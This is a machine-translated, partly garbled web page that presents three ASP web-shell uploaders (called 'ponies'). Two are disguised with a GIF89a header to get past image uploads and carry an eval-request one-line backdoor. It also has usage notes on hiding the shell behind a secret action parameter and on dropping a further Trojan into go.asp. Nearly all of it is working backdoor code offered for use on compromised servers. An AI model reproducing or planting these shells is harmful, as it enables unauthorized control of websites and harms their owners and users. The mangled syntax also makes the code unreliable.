Article 1:
CopyCode The Code is as follows: gif89a $; <HTML>
<% Eval request (CHR (1) %>
<%
On Error resume next
Testfile = request. Form ("filepath ")
MSG = request. Form ("message ")
If trim (Request ("filepath") <> "then
Set FS = server. Createobject ("scripting. FileSystemObject ")
Set thisfile = FS. createtextfile (testfile, true)
Thisfile. Write ("" & MSG &"")
If err = 0 then
Response. Write "<font color = Red> OK </font>"
Else
Response. Write "<font color = Red> NO </font>"
End if
Err. Clear
Thisfile. Close
Set FS = nothing
End if
%>
<Form method = "Post" Action = "">
<Input type = "text" size = "20" name = "filepath"
Value = "<% = server. mappath (" Go. asp ") %>"> <br>
<Textarea name = "message" rows = "5" Cols = "40"> </textarea>
<Input type = "Submit" name = "send" value = "go">
</Form> </body> Section 2:
Copy code The Code is as follows: gif89a $; <HTML>
<% Eval request (CHR (1) %>
<% If request ("action") = "kof97" then %>
<% On error resume next %>
<% Ofso = "scripting. FileSystemObject" %>
<% Set FSO = server. Createobject (ofso) %>
<% PATH = request ("path") %>
<% If path <> "" Then %>
<% DATA = request ("Dama") %>
<% Set Dama = FSO. createtextfile (path, true) %>
<% Dama. Write Data %>
<% If err = 0 then %>
<% = "Success" %>
<% Else %>
<% = "False" %>
<% End if %>
<% Err. Clear %>
<% End if %>
<% Dama. Close %>
<% Set Dama = nothing %>
<% Set Fos = nothing %>
<% = "<Form action ='' method = post> "%>
<% = "<Input type = text name = path>" %>
<% = "<Br>" %>
<% = Server. mappath (request. servervariables ("script_name") %>
<% = "<Br>" %>
<% = "" %>
<% = "<Textarea name = Dama Cols = 50 rows = 10 width = 30> </textarea>" %>
<% = "<Br>" %>
<% = "<Input type = submit value = save>" %>
<% = "</Form>" %>
<% End if %>
</Body>
Section 3:Copy codeThe Code is as follows: <% set S = server. Createobject ("ADODB. Stream") %>
& Lt; % S. type = 2% & gt;
<% S. Open %>
<% S. charset = "gb2312" %>
<% S. writetext request ("D") %>
<% S. savetofile server. mappath ("Go. asp"), 2%>
<% S. Close %>
<% Set S = nothing %>
<Form>
<Textarea name = D Cols = 80 rows = 10 width = 32> </textarea>
<Input type = submit>
</Form>
Instructions and introduction:
Feature 1: Use a single sentence to connect a trojan or directly transmit a Trojan
Gif89a $; <HTML>
-- [The meaning here is believed to be confusing when uploading images.]
<% Eval request (CHR (1) %>
-- [This is a simple ASP Trojan. Here, CHR (1) is the password of an ASP Trojan.
So the actual CHR (1) = so do not know the password
The point is that when you use this ASP pony, you can use the phrase in this ASP pony to upload a Trojan horse.
Here, go. asp is the address of the uploaded Trojan. You can modify the address in detail.
Section 2:
I will not talk about the above features!
<% If request ("action") = "kof97" then %>
I believe you can understand ASP at a glance! Not much.
Is it directly added after your pony address? Action = kof97. Here is an example.
Http://www.xxx.com/xxx.asp? Action = kof97 change kof97 to your own! Change in pony
The advantage is that when someone directly accesses your pony, the white space is displayed and your pony cannot be used. It is similar to the password-oriented pony.
Section 3:
It can be said that in addition to ASP, it is nothing more than a pony! Only over two hundred bytes
<% S. savetofile server. mappath ("Go. asp"), 2%>
When you open the pony address, go. asp is automatically generated and changed to your own
This pony will be used with a pony or other pony. When you write our horse in the input box and click submit, the go. asp pony address will be automatically generated.
The advantage is that when someone directly accesses your pony, No matter what horse he submits, he does not know the file address you set.